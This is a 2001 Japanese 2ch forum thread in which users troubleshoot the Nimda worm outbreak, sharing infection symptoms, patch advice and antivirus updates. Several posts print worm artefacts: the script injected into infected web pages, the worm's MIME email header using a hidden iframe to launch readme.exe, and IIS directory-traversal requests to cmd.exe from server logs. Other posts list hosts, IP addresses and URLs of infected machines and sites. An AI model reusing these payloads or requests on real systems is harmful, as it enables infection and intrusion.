（私は社会人なのに、英語力もネット知識も厨房以下の能力なので）
２ｃｈのビジネスソフト板で誉められてたから入れていたんだけど
ちゃんと役に立ってくれてたんだ！　ﾋﾞｸｰﾘ。

オミトロンもダウンロードしたけど、こりは使い方がわからんので
使ってない。

『*.eml』で検索→８つヒット
『readme.exe』で検索→なし
『MEP51B3.TMP.EXE』で検索→なし
『Nimda』で検索
→１つヒット
　名前　troj_nimda[1]
　フォルダ名　C:WINDOWS\Temporary Internet Files\Content.IE5\EJYZV12C
　サイズ　15KB
　ファイルの種類　Microsoft HTML Document 5.0

これは感染してるってことですか…？
WIN98でIE5.0です。

>>181 >>184
ダウンロード確認のダイアログボックスが出た時点で、
勝手にキャッシュされてるとおもわれ。

>>152
正直、俺も関係ないADMIN$のファイル共有を発見＆解消できた厨房だ。

>>191
C:WINDOWS\Temporary Internet Files\Content.IE5\EJYZV12C
コれは、キャッシュ。ココに有るってことは、そのページ開いてる
訳だ。。
感染してるかどうかなんてわからん。パッチ当ててあるか解らんし。

>>191
感染してないだろ。

>>192
それがセキュリティホールってことかね？
そこから実行までのプロセスがわからんが…

いいからキャッシュ消せ

勝手に実行するのが穴だろ。

ノートンINS+IE5.5SP2

スキャンしたところ「ニダ」に感染してた。

恐らく、感染したサイトの履歴に反応したものと思う
同じ症状の方いますか？

さらに驚くべき機能が明らかに

http://headlines.yahoo.co.jp/hl?a=20010919-00000001-wir-sci

そもそもelmファイルの役割とはなんですか？

だ　か　ら　！
感染したらどうすりゃいいんだよ！

>>197
それならキャッシュされただけでは何も起きないよな？

>>199
すげー。まさに全機能網羅って感じだな。

うちの鯖に残ってたログより、2000厨リスト。.jp のみ。
ここ見るときは気をつけてね。

28 alr83sv1.wky.go.jp
7 asia00.adsp.or.jp
9 d2c67dd7.t-net.ne.jp
28 dbsearchsv2.kyoto-archives.gr.jp
3 dns.psa.gr.jp
98 dns1.mfl.co.jp
5 dns1.nskkk.gr.jp
15 dnsocn.nishida.co.jp
3 ftp.netkobe.gr.jp
14 himika-gw.himika.co.jp
7 imorine70.sg-jc.ac.jp
14 kfpc.knowledge-f.co.jp
30 lab.kdn.co.jp
93 mailserver.joypack.co.jp
14 mexnt4.mex.trans-cosmos.co.jp
14 n01-075.e-tokyo.highway.ne.jp
119 ns.dmn.co.jp
14 ns.ins.co.jp
5 ns.netkobe.gr.jp
1 ns.sysman.co.jp
14 ntsegb-unused-210-172-132-042.interq.or.jp
73 pc2.perlite-unet.ocn.ne.jp
4 pop.netkobe.gr.jp
38 qns.shirai-law.gr.jp
44 s8638ks0.kdn.co.jp
29 s9771114.kdn.co.jp
158 server.tsubame-library-unet.ocn.ne.jp
14 siu-s005.suzuka-iu.ac.jp
1 smtp.netkobe.gr.jp
14 t-net.tamano.or.jp
14 www.akis.co.jp
17 www.asoyoho.co.jp
1 www.netkobe.gr.jp
14 www.prland.co.jp
14 www01.orico.co.jp
48 www2.kdn.co.jp

すげー数や。

>>201
回線切れ。

>>202
readme.exeファイルまではdecodeされてるみたいだけどな。
<NAVのメッセージ見てると

>>192
キャッシュされてるだけだったら大丈夫ってことでしょうか？

>>205
禿げしく同意。

>>205
回線切るしかないのかよ！

回線切ってワクチンソフトが除去に対応するまで待つ

>>207
IEにパッチが当たっているのなら大丈夫なので、
キャッシュを消してしまいましょう。

>>207
よかった！！！（涙）
いろいろ調べたんですけどあのキャッシュ以外怪しいのは
なかったので大丈夫そうですね。
キャッシュは消しました。ありがとうございました。

とりあえず安心しました。
IE5.5 SP2にアップしてきます。でも注意ってことですよね>>78

間違い、回線と電源切れ。

不正なmimeヘッダ関係ならここにある。nimdaの一般ユーザ用？の穴ね。
日本語サイト。
//isweb27.infoseek.co.jp/computer/zaddik/
サンプルコード、有るけど興味本位では実行しない方が良いよ。
パッチ当たってないと、プロンプト表示されてコード走ったような気がする。
春頃の話しだし、覚えてないよ（ｗ
2ksp1だった。SP2なら問題なし。

>>213
まあ怪しいファイルはDLしないし実行しないことだ。
「割れず」なんて言葉で検索してるやつは無理だろうが…

symatec英語版より抜粋
http://www.sarc.com/avcenter/venc/data/[email protected]

The worm then attempts to modify files with the extension .htm,
.html., and .asp or filenames matching default, index, main and
readme on the local system that are shared with other network
computers. .EXE files are infected and .EML and .NWS files
are replaced by the virus.
やっぱ書換えまくりですね。やばい。英語力自身ないので間違って
たらｽﾏﾝ。

アップデート出来ない…ダウンロードしている途中で
止まってしまう。もしかして混んでる？

で、駆除法は？

>>212
admin.dllが無いか確認しとけ

>>219
各ウィルス駆除ソフトが対応するのを待つ。
手動で駆除しようなんて無茶だ。

VirusScan5.1がBekcyに対して過剰に反応します。
＜ｈｔｍｌ＞＜ｓｃｒｉｐｔ　ｌａｎｇｕａｇｅ＝”ＪａｖａＳｃｒｉｐｔ”＞ｗｉｎｄｏｗ．ｏｐｅｎ（”ｒｅａｄｍｅ．ｅｍｌ”，　ｎｕｌｌ，”ｒｅｓｉｚａｂｌｅ＝ｎｏ，ｔｏｐ＝６０００，ｌｅｆｔ＝６０００”）＜／ｓｃｒｉｐｔ＞＜／ｈｔｍｌ＞
を半角にしてメールを送ると
ウイルス検出って騒ぎ出します。
おかげさんでメールが一部紛失。

駆除方法はまだわかってないそうです。
とりあえず感染したのがわかったらPCの電源切って
つながないほうがいいとのこと。
駆除方法がわかるまで待つしかないようです。

>>220
admin.dllはあってもいいんじゃないか？
日付の新しいのがあったらダメだってことか？

ＳＰ２インストールしようとすると
「前回のアップデートが完了してません。完了してから
　行ってください。」って出るんですけど。
身に覚えがまったくありません。
誰か教えてください。

SP2ダウンロードしようと思ったけどダイヤルアップであの容量はきつい。
問題の部分だけ修正する軽いやつでないかなぁ。

>>225
どこだかにセットアップ続行の実行ファイルがあると思うんだが…
どこだったかな？

>>220
admin.dllはありませんでした。
それと、HDD内のHTMLファイルが改ざんされるようですが
今自分のPCで再編集したHTMLファイルをWEBスペースに
アップして、他の感染してないPC（IE5.5SP2)でみたところ、
何もでてこなかったので大丈夫そうです。
親切にどうもありがとうございました。

>>225 ＴＥＭＰフォルダにゴミがあるのかもしれない。

>>217 これで*.EXEファイル書換え決定？

Nimda って Code Red II との相乗効果が考えられるから恐いよね。僕の管理
している web server では、Nimda の出現と同時に Code Red II の攻撃件数
が増えてる…… >>54 さんが同じこと書いてたけど。

>>217

日本語情報ではMcAfeeが素早い模様。

http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM

コピペと翻訳はおまかせっ（ｗ

digidon.orico.co.jp
なんて所からまだ来る。
デカプリオ助けて！

>>232 たしかに（笑） だがMcAfeeは信用ならんらしいので
一応信用できるソースをと思ってね（笑）

NimdaってIISのセキュリティーホールの対策パッチを入れているサーバーには
感染しないんだよね？
ということはMSNはこのパッチ入れてなかったってこと？
もしそうなら空いた口がふざがらない。

>>235
クラックされたんじゃないのかな？

>>236
あまり詳しくないのでよく分からないけど、要するに普通のサーバーの
感染の仕方とは違う方法で感染したってこと？

システムファイルとかＥＸＥとかファイル書換えるってことは、
感染したら最後ってことか。怖いね。

>>235
ウェブサーバーを共有設定してあったんだろ（ｗ

おいらは、シマンテックに感動した。
夜を徹しての解析作業。少しずつ更新されていくページ。
ノートン2002購入決定デス

>>227
すみません、是非セットアップ続行実行ファイル教えてください。

>>229
ゴミってどれのことでしょうか？

マカヒーは信用ならん！という皆様にｼﾏｿﾃｯｸのページより。

http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
＞最後に、ワームは感染システム上のMMC.EXEのような正当なファイルをワームで上書きしてしまいます。

凶悪ですねえニムﾀﾝ。

>>239
そっちかもしんないなぁ。
実行ファイルが共有されてて、その実行ファイルに感染されたのを
知らないで実行しちゃったら感染するもんねぇ。

>>241
ブラジャーのキャッシュ。

>>235
そのとおり、結構古いバージョンのIISを使っていたみたい。
あっぽ〜ん！
しかも、終戦記念日にクラックされて、1月間気づかなかったというおまけ付き。
あっぽ〜ん！

１４時から１９時までに４０００発以上
Ave.８００発／Ｈ
ってことか

>>241
Windows Update Setup Files とかいうディレクトリないか？

いずれにしろMSNが”パッチ入れ忘れてました。”とコメントすることは、
考えにくいから、本当のところは担当者しか分からんな・・

>>245
それが日付って言ってたやつか…

ニムダに感染するようなやつはパソコン使うなニダ！！

>>245
248を書いたあとに見た。
どこかにソースある？

このソースがページの末尾に付加されてるのがNimdaなの？
<html>
<script language="JavaScript">window.open
("readme.eml", null, "resizable=no,top=6000,left=6000")
</script></html>

BlackIceにアタックの跡があったんで辿ってみたんだ。

ノートンAVの定義ファイル、
18時半にLive Updateしたばかりなのに、
今繋いだらまた更新されとる・・・

>>233
あといけてるところでは
alr83sv1.wky.go.jp - - [19/Sep/2001:XX:XX:XX +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 299
なんてのもあった。

>>251
感染してるときのMSNのトップページなんか誰かミラーしてないのかな？

HP見ただけで感染なんて、恐ろしい。
IE5.5のアップデートやノートンAV、まめに最新にしておいてよかった。
過去ログみて感染しているＨＰ試しにアクセスしたら、
ノートンＡＶ君が警告だしたよ。
今だに感染したままのＨＰあるから、怖いね〜。

>>252
IISに感染するとそのスクリプトをHDD内のhtmlファイルに追加しまくる。
で、その改竄されたページを見ると"readme.eml"がダウンロード。

どっかに逆汗さらたもの無いですか？
ndisasmwかけてみたけど、これじゃｻﾊﾟｰﾘです。

ウィルスバスターは、対応済みです。
■ ソリューション
トレンドマイクロ製品ユーザ様向けソリューション
パターンファイル９４１以降、検索エンジン５．２００以上で対応しています。
（最新パターンファイル・検索エンジンのご使用をお勧めします。）
現在ウイルス対策製品をご使用でないお客様向けソリューション
トレンドマイクロ社ホームページより、30日間有効期間中フル機能で
ご使用できる「ウイルスバスター2001」体験版をダウンロード、
検知した場合手動削除手順にて削除してください。
トレンドマイクロ社ホームページより、
「ウイルスバスター　オンラインスキャン」にて
マシンのウイルスチェックを実行し、
検知した同様に手動削除してください。

http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm

>>255
ソースってのは情報の出どころのURLってことね。
自分の良く行く板では普通に通じてたから紛らわしい表現使ってしまった。
スマソ。

http://61.208.221.9/

>>260
違う違う。
ソースはそのトップページを見た人が日付に気づいたって書き込みだと思うってことよ。
news板じゃねーか？

＞２５７
説明ありがとう。

スキャンしようとするといきなり強制終了。
何度やっても！！
こんな説明がでました
SCAN32 のページ違反です。
モジュール : MCSCAN32.DLL、アドレス : 0167:004d103f
Registers:
EAX=00000000 CS=0167 EIP=004d103f EFLGS=00010206
EBX=00000000 SS=016f ESP=0407d1b0 EBP=0407d780
ECX=000000af DS=016f ESI=00000000 FS=375f
EDX=0000001c ES=016f EDI=03dfcad6 GS=36be
Bytes at CS:EIP:
8b 08 ff 51 1c 39 c2 76 04 31 c0 eb 54 83 7c 24
Stack dump:
000000af 0407d7b6 00000000 0407dc20 004da228 00000000 03df019c 0407d798 ba89c888 5048cc82 a282c982 c482c182 f182c793 6383c582 8b835b81 4c44f082

>>261
いやん、要注意だね。
SP２に代えてたから助かった。

134 名前：MSN広報部 投稿日：01/09/19 19:33
http://help.msn.co.jp/notice.htm
ご質問とご回答
Q.自分の会社のサーバーが被害にあった。MSN からの攻撃が原因ではないか。

A. MSN ではサーバーが直接マイクロソフト社外のサーバーに対して影響を及ぼしたことはないと考えています。
MSN のインターネット上に開いたサーバーは、サーバー機能ではなくそのコンテンツファイルが 9/18 の夜 11 時以降
1 時間ほど感染した状態にありましたが、これにより影響を受けたのは直接このサーバーにアクセスした利用者の
コンピュータになります。なお、利用者のコンピュータが感染するには、ブラウザのバージョンなどいくつかの条件が
そろった場合に限られます。

IE55SP2 VB2001パターン941の武装でしたが
ある個人のページで地雷を踏んでしまいました。
すぐさまVBが反応して、「隔離成功」とのメッセージが出ました。
これって、「アウト」「セーフ」？
どうしたらよいでしょうか？？

>>267
セーフ！

あちこちでパニック状態です。

>>261
踏むなよ！！！！
感染するぞ。

>>261
いまやウイルスは日本だけの法律で裁かれるのではない。
FBIなんかが捜査したりしてるんだぞ。
不用意にリンク張るのは貴方にとって危険な行為だ。

昨日、ＭＳＮ開いたら勝手にもうひとつタスクバーが開いて、その後
メディアプレーヤーが起動しました。もちろんプレーヤーは
そんな形式のファイルは再生できませんと、エラーになったのですが・・・
これってＯＵＴですか？
ちなみに今日、ファイル検索したところreadme.exeはなし、
.emlはキャッシュにのみ存在していました。

まじで頼みますＹＯ！

>>255
>>>251
> 感染してるときのMSNのトップページなんか誰かミラーしてないのかな？

見た目はかわらんよ。
ここで表示されたとこに行くと最新の感染サイトに行かれる。
http://search.fresheye.com/?kw=readme%2eeml&term=weekly


むしろ、これミラーして永久に藁いものにしたらどうかな。
http://help.msn.co.jp/notice.htm

ＩＥ６正式版が登場

http://www.microsoft.com/japan/ie/

>>275

これで　にむだサイト開くとどうよ？

>>266
それ、別に嘘が書いてあるわけじゃないけど、
読むと頭にくるよな。

ほんと、逝っていいよ >>MSN

このガッコかっこわりぃ・・。

http://www.takara-univ.ac.jp/fifty/

感染してるのにトップ消しただけで感染されっぱなしだよ・・。

5.00 SP2の人は5.01 SP2にしないとマズイの？
Win2K使用してるんだけど…
以前Win2K SP2をあてただけで…

203.48.111.122
203.49.88.225
203.5.192.203
203.55.8.1
203.55.94.17
203.56.41.2
203.58.208.228
203.59.56.10
203.62.158.7
203.67.11.23
203.67.122.246
203.67.161.91
203.67.165.1
203.67.52.173
203.67.74.60
203.69.109.219
203.69.120.168
203.70.124.93
203.70.131.252
203.74.99.202
203.75.139.11
203.79.148.119
203.79.211.251
203.79.224.12
203.8.88.224
203.85.132.193
203.86.100.129
203.86.100.236
203.89.197.66
203.89.235.10
203.93.167.55
203.93.219.163
203.93.245.144
203.97.10.171
203.97.231.254
210.50.122.195
211.21.132.17
61.219.239.252

>>278
貼るなって（ｗ

キャッシュにreadme.emlとw3.nimda.a@mmがはいってた俺は死んでる?
ノートン先生の検索だとなにも引っかからなかったし何がなんだかわかりません

>>282
ウイルス定義は最新になってる？なってれば引っかかると思うが

Sony から Nimda 君がきた（藁

readme.eml
ってファイルの状態はMIMEで包まれてるからまだ平気。
これをダブルクリックしたりすると、解凍されてreadme.exeが
出てくる。
IE5でSP2のパッチが当たっていない場合、ダブルクリックしないでも
readme.exeが溶け出して感染する。
ってことかいな。

>>283
>>>282
> ウイルス定義は最新になってる？なってれば引っかかると思うが

んだ。きのう更新してても、きょうもやらないとダメだぞ。

readme.emlを見つけた瞬間に削除しちゃって
その後にアップデートされてる事に気づいて更新して検索しました
やっぱりreadme.eml入ってた時点でアウトかな…

>>279

5.00SP2なんて存在しない。
Win2000にSP2あてたのなら、IEも5.01SP2になっている。

IISが稼動してたサーバーが感染して場合はどうすればいいの？
とりあえず今は線を抜いて隔離してるんだけど。

readme.eml入ってるだけでは感染してないと思う。
感染したらreadme.emlをファイル名変えてコピーしまくる。
LAN内のネットワーク共有フォルダにも。

実行したり自動実行されてたりしたら知らんが。

モロに感染したPCをアンチウイルスで除去したんだけど、
ほんとに除去されてる？
DLLを書き換えられてるのも戻るってこと？

マイクロソフトのサイトいったら
ファイル名欄にreadme.exeと出たメディアプレイヤーが
立ち上がりました。

ノートンでしらべてら感染しとりました

つか、感染マシンにウィルス定義ファイルてどやって取り込めばいい？
感染してるからネットワークにつなげないし。
３分以内ならセーフ？

実行ファイル見たら、後ろの部分に色々細工されてた。
ファイルの中身を readme.eml で検索して、実行ファイル名が1000個以上
でてきた。復旧にどれだけかかるんだろう・・・・

アタック先、判る範囲でメールしても管理者ってあまり読んでないのね。
で、そのIISサイトのページみても、ニムダ以前の改竄が既にあったりして笑わせてくれる。
で、ネットワーク事業者ってのが結構多いな。(ﾜ
女子大もあったし、暇だったんで事務所に電話しちゃった。
カワイ声したオバチャン、ﾖｶﾀよ。

>>294
ダイアルアップでどう？

desktop.emlってのがあったよ。中身はreadme.emlだった

おいおい、ノートン、もうアップデートが出てるよ。

昼にアップしたばっかりなのに。

ヘンに心配するぐらいなら
素直にフォーマットして再インストールしろよ

ウィルスバスターもね♪

＞297
ダイアルアップでも自分の付近のIPにアタックかけちゃうと思う。

>>288
さっき SP2 に上げたんだが、バージョン情報曰く
5.00.3315.1000
更新バージョン: SP2
だとさ。ほんま大丈夫なんかいな。

@ITがアクセスできなかったのはNimdaのせいだったのねーん。
http://www.atmarkit.co.jp/aboutus/aftercare/aftercare/aftercare.html

>>299
俺もアップデートしたよ
なんか連発してるねこの頃

ノートンがw32.Nimda.A@mm(dr)
に感染しています。

このファイルは検疫しました。

大丈夫でしょうか？

で、みんなんとこはどのくらいアクセスが来てる？
うちは今日今までで３６６７件だね。昨日は７７５件だった。
その前の日まではCodeRedが平均で１００件くらいだったんだけどね。

>>306
とりあえずシマンテックに送ってあげたら？

>>307
ルータータイプのADSLモデムにしてから、ノートン君のログはゼロ。
なんだか、さみしい。

>>306
隔離されているということだから大丈夫。
俺なんか、記念にいろんなウイルス10個ほど保存してある。
もちろん、検疫（隔離状態）されています。

>>308

マイクロトレンドにも送ってあげたら？（ｗ

うちの会社もやられたみたい。。。
詳しい事は解らないけど3時からメールもWEBも使えなかった。。。

イヤイヤ、こんな簡単に最新ワーム君、感染サイトからゲトできるとは。
ちゃんとパチ当てとけば慌てる必要ないのにね。
去年3月だよ。。マイ糞、不正MIMEヘッダのパチ出してたの。。。。
サムプル攻撃コード、バグの発見者が同時に公開してた時点でヤヴァイと
はオモたけど。。まさか春先のバグ使ったウイルスが今時こんな騒ぎにな
るとは。
破壊ルーチン組んでないのは、感染広げるためかな。
トラフィク増大して、鯖のゴミログ増えると不正アクセスしやすいんだろ
うね。流した張本人にはキト。テロが流したか、アンチが流したか、ﾁｮｿ
かな。

>>309

その状態で>>278行ったらどうなります？

>>314
まだ>>278そのまんまなんだな、、、
いいかげんにしろよ

>>313
どうでもいいけど、わざと読みにくくして楽しいか？

System\CurrentControlSet\Services\VxD\MSTCP NameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\ SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

（中略）

c: readme main index default html .asp .htm
\readme.eml .exe mep winzip32.exe
riched20.dll .nws .eml .doc .exe
（略）
\readme*.exe admin.dll qusery9bnow -qusery9bnow \mmc.exe
\riched20.dll boot Shell explorer.exe load.exe -dontrunold
\system.ini \load.exe \\ octet

後半部分のファイル名、拡張子を使ってるやつに色々細工するんだろうね。

>>315

いまたぶんこのガッコ無人と思われ・・。

>>317

> 後半部分のファイル名、拡張子を使ってるやつに色々細工するんだろうね。

でしょうね。
と、いうかバイナリエディタとかでこの部分いろいろ改造して流すヤツも出て来るんだろうね。

にむだ.b　とか　.c　とかって。

>>314
278ってニムダ感染サイト？
そうだったら、他サイト踏んでみたが、
ノートンアンチ君が警告だしたよ。「危険なコードが含まれています」だって。

　あの、geocities.com のトップ以外のユーザー個別のページがすべて感染してるんですけど･･････。
　すごいことになってるような･･････。

>>320

なるほど〜。そりゃ踏めば警告でますよね。

厨質でスマソ、ルータータイプのADSLモデムだと、アタックを受けないよ、ってわけ？

>>321
つながんないよ、トップも

>>321

ガ━━（ﾟДﾟ;)━━ン

おれそこに頁おいてた・・。

>>316
いや、独り言に近いんで、、、、スマヌ。
ただ、アンチウイルスソフトだけに頼るのがいかに危険かって言いたかった。
バグ/フィクス情報の方が重要な事多い。
http://www.microsoft.com/japan/technet/security/current.asp
↑今後のためにもココはマメに見とくべき。気休めだけど。
新しいの出たら、説明良く見て当てる事。＞感染しちゃった人

>>325

> http://www.microsoft.com/japan/technet/security/current.asp
> ↑今後のためにもココはマメに見とくべき。気休めだけど。
> 新しいの出たら、説明良く見て当てる事。＞感染しちゃった人

・・・ここは感染してないよね？(^^;

http://www.geocities.com/jumptocoollyrics/newsongs.html
http://www.geocities.com/loverlands/webmasters.html
http://www.geocities.com/shorty690322/extra_income.html
とか。
対策してない人は開かないでください。またはJavaScriptを切る。

大事なファイルを守りたい人は、LHAまたはZIPで圧縮かけておけば
いいんじゃないでしょうか。
私はhtmlファイルをいつもZIPで圧縮してで保存していたため、
htmlファイルが書き換えられるという被害にはあいませんでした。

マカーは大丈夫よね？

ZIPもいじられるって、どこかに書いてなかったっけ？

サーバはCodeRedの件があったのでなんとか大丈夫だったけど
クライアントはほぼ全滅。
アンチウイルスソフト入れてるのに切ってたりパターン
ファイルを更新してなかったり・・・
勝手に設定変えるなﾎﾞｸﾞｪ!!!!!!!!!!!!!!
つーか俺管理者じゃ無いのに何でこんな事やってるんだろ…(涙

と、いうか感染したら具体的にどんな不具合があるの？
イマイチ分からんのだが

http://geocities.yahoo.com/
から
下の Business & Finance とか、たどっていくと･･････。
すべてに[Nimda Killed]が出る（Proxomitron用の手製の Nimda フィルター）。

IE4は大丈夫なの？
使ってるブラウザがNN4.5で、IE4の入ってるマシンです。
先ほどかけた段階ではなにも入ってませんでした。

>>332
他人のマシンを手当たり次第、ありとあらゆる方法で侵入を試みる。
それだけ。

>>327

感染してないぞ

ブラウザ使わないで、かちゅ〜しゃ使って、２ちゃん見てるだけだったら感染しない？
（人として問題があるのはわかってる）

広告で自動挿入されるスクリプトまでウィルスだと思ってるのでわ？

>>329

何をもって大丈夫というのか知らんが、感染ファイルはゲットできるぞ。

しかもMacのウイルスチェッカは無警告ときたもんだ。

>>335
ん？つまり、自分が踏み台になるって事？

>>339

ういるすファイル収集して飼うならMacだな（藁

>>340
ワームだから踏み台じゃない。
単に増殖するだけだよ。

5.00.3315.1000
更新バージョン: SP2

5.01の.01は上のどの部分に当たるのでしょうか。
痛い質問ですいません。

>>322
モデムのルーター機能の中で、NAT機能ってもんがあるので、
結果的に不正侵入を防ぐことになっているんだそうだ。
これで、完璧なわけではなく無いよりはあったほうが、
セキュリティが向上するみたい。
言わば、門番を立たせているようなもんです。

>>333
それは君の正規表現が誤検知してるのと違うの？

321の母でございます…

>>330
ここ
http://www.hotwired.co.jp/news/news/technology/story/20010919301.html

>>343
それ多分5.01のことだと思う

>>343
そういう問題ではないような。。。

InternetExplorerのバージョンを確かめましょう
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000324.htm
ここに一覧があるけど、あんまカンケーないみたい。。。（w

>>343

おれもこれだ。

っていうか、他のヤツにきかれたときこれが5.01だ、ってどういったら納得してもらえるんだ？

オリコの野郎、まだワームばら撒いてるぜ！（藁
ネットワーク管理者は何やっとる！
www01.orico.co.jp - - [19/Sep/2001:18:30:54 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"

>>349様
ピンポイントのレス、ありがとうございます。

CodeRed
　↓
繁殖活動を行いつつ、時期が来るとホワイトハウスに対しDDoS

CodeRedII
　↓
オリジナル以上の感染力と、バックドアで世界中のIISを食い物に

Nimda
　↓
様々な感染方法で、IISサーバーだけでなく、クライアントマシンも狙う

?????（次回作）
　↓
世界中のIISサーバーとクライアントWindowsマシンに
バックドアをしこみ、繁殖活動も行いつつ、1時間おきとか
定期的にWindowsUpdateのサーバー、MicrosoftTechNetの
サーバーにDDoS

こんなんになったらお手上げですな

>>353
やめて。。。コワイカラ。。。

簡便してくれよ＞MS・・・

ブラクラチェックみたいに感染したサイトを検知ってできないのかな？

しかしゴいねこのニムダっての
１日で二千回以上喰らってるよ （；´Д｀）ﾋｰ

>>355

安易な簡便が、勘弁な事態を・・。

やれそうな気はするけど・・・。

自分には無理だが（ｗ

感染しておいて他人事かよ・・。

http://www.mainichi.co.jp/digital/flash/010919-1.html

そのうちMSは訴えられるぞ・・・

MOONブラウザとかのタブ型ブラウザは大丈夫でしょうか？
一応IE6入れてます。

くそっ！今日はNimdaのせいで仕事にならんかったよ。
朝9時に仕事場についたら手遅れだったよ。
すでに数台発症してた（涙）
ネットワークはパケットの台風が吹き荒れ
同一フロア数十台のＰＣがフォルダ共有していたため、
あやしいeml.tmp.exe.dllファイルが出るわ出るわ。

アホウな質問かもしれませんが・・・・

ネスケはかんせんしますか？

>>362
IEのコンポーネントをつかったブラウザ、メーラーは危ない。
でもIE自体が6とか、パッチ当たってるならOK

>>362＆質問君
今まで出てきたウィルスやワームの対策を見てみ。
対策されてりゃにむだなんて怖くないの。

今、ログ見たらすごい事に(w

ところで *.*.ed.jpってなんだっけ。

>>365
安心しました。ありがとう。

おいおい、昼ごろのパラメータでスキャンして安心してたら、夕方のでスキャンし直すとまたぞろみつかるぞ。＜ノートン

だ・か・ら、取り敢えず、
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020
↑MS01-020当てとけって。。。クライアント君。
↓ウイルス情報良く見なさい。何処の穴心配すれば良いか。
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]
ブラウザのバージョン・SPのバージョン調べるより早いぞ。

CODE-REDのMS00-078塞いでない糞鯖の糞管理者なんかシラネｰよ。

>>366

ありゃ？漏れはW2k SP2なのにニムダのバックドアがいるぞ？
同然IEも5.01SP2だ。

いまSP2にしたんじゃない、一ヶ月以上前だ・・。

知られていない感染経路があるのか？

>>367
教育機関だっけ。専門学校とか？

>>372

私立の小中学校とかは？

公立は地域ドメインだよね。

ＳＰ２＆パッチ。

IE6β使ってたら、感染した

SP2＆パッチって変な言い方だな。

SP2、もしくは　SP1+パッチだろ

>370
すんませんsp1も当てていなかったヘタレなので
MS01-020を当てられませぬ…

b. [ネットワーク名] SEIRYO-NET
f. [組織名] 国際交流研究会

感染(w

ワームで国際交流（・∀・）ｲｲ!!

>>371
特定のIRCクライアントからも感染するらしい。

MSにはもううんざり・・・

だった。ＳＰ１＋ぱっち
ネットから切断した状態で当ててなかったかだな。

パッチしようとしてダウンしたら当てる必要ねえぞｺﾞﾙｧって(´Д`)

>>361
慣れてるだろ・・・

一応VB2001がインストールされていて、かつ最新のウィルス定
義ファイルをさっきダウンロードした。
上記の条件でIE5.5使ってる俺の下記の認識はあってるかな？

1.SP1すら入れてないので容量の少ないパッチだけではだめだ。
2.よって容量のでかいSP2を入れる必要がある。
3.でかいファイルを落とすのは面倒なのでやらない。とりあえ
　ずVB2001でNimdaを凌ぐことに決定。

どう？

未だにウチの会社はパニック中
感染したＷｉｎ９８のレジストリは、どう直しています？

おうちに帰りたいよー。

>>385
再インストールしないとダメです。

>>385
再インストール決定かどうかはまだわからん。
修正プログラムが出るのを待つしかないが、とりあえず
レジストリだけなら数日前のものに復元って手もあるな

ドライブ丸ごと共有出してる事自体がアホなんですがね。
改心せいやー

おかしくねえか？

この対策ってCodeRedのときと同じだろう？

クライアントはともかく、WebSiteがなんでこんなに感染しているんだ？

げっ、Unicodeのバグ使ってんの、確かコードブルーだった。

ここ読んで怖くなりました。
さっそくIE5.5SP2にして、ノートンLiveUpDateして、
そしてこれからはずっとスクリプトオフにしてネットやります。
面倒だけどしかたないですね。

ソース解析やってる人居る？
年・月・日を見てるんだけど、これ何やってるんだろ？

>>390
いや、CodeRedよりもいろいろと穴をつくんで・・・

感染しちゃいました♪
すごいアタック数ですね････
どんどん増えてる････

>>390
確かに。事実なら少なくともMSNが感染するのはおかしいよな。

>>393
あれ、ソース出てたの？それとも逆アセンブルしてんの？

マックで良かったﾊｱﾊｱ

>>387
まじっすか！？受け持ちだけで・・あ〜ああ。

シマンテック　朝のから更新されているよね・・・
あ〜もう手動でやったことばっかりだな
レジストリのこと触れていないなあ

>>387

漏れはW2Kだったけど、CodeRedのときは、再インストールではだめで、WinNTフォルダごとごっちょり消して生HDDにインストールしたWinNTフォルダのイメージをコピーした。

ニュースステーションに出たね。
財務省もやられたとか。

まだ発見されてないバックドアありそう・・・

>>390
ﾏﾇｹがこんなに多いとは・・
これが現実か？
MSに文句言う前にﾊﾟｯﾁ等はあてろや　ｺﾞﾗｧ

これって感染したマシンがＩＰをランダムにスキャンしてるんですか？
セキュリティが弱いＩＰを発見した場合に感染ですか？･･･。

>>399
いや、だからレジストリだけならscanregで数日前のものにリストアしろや

結局、http/80が大穴だと。。。クライアントもサーバも。

もう、新しいフォルダが勝手に作られて
勝手に共有されて・・・笑いが止まりません

>>397
逆汗です。
SourcerとSoftICEが欲しいナリね。
有事期間限定版とか出してくれないかな・・・

>>399

スキャン過程みている限り、まだレジストリの対策はなにもできていないと思われ。

夕方のパラメータでもチェックから漏れているファイルがあるような。

クライアントさんがバシバシ再起動してくださったので
残っていません＜数日前のレジストリ

感染したＰＣはネットワークから切り離して
対策プログラム待ちするのがベストかなー。
ただいま数台放置ﾌﾟﾚｲ中(w

>>402
>まだ発見されてないバックドアありそう・・・

漏れの見た状況をみる限りそうとしか思えない。

そもそも、このウイルスの作者が既知のセキュリティーバグ「だけ」しか利用していないという保証もない。

疑惑だけど、SP2にさらにセキュリティーバグがあるか、未知のホールを突いてないか？

javascriptをオフにしていてもソースを見て
emlファイルにアクセスしても感染するのでしょうか？

>>412
あるかもねー。

昨日の時点で共有フォルダやられるの知ってたら
何台か救えたのに。うぅぅ

電子メール経由で感染したマシンから
ローカルでWEBサーバに感染したんじゃないの？

>>410
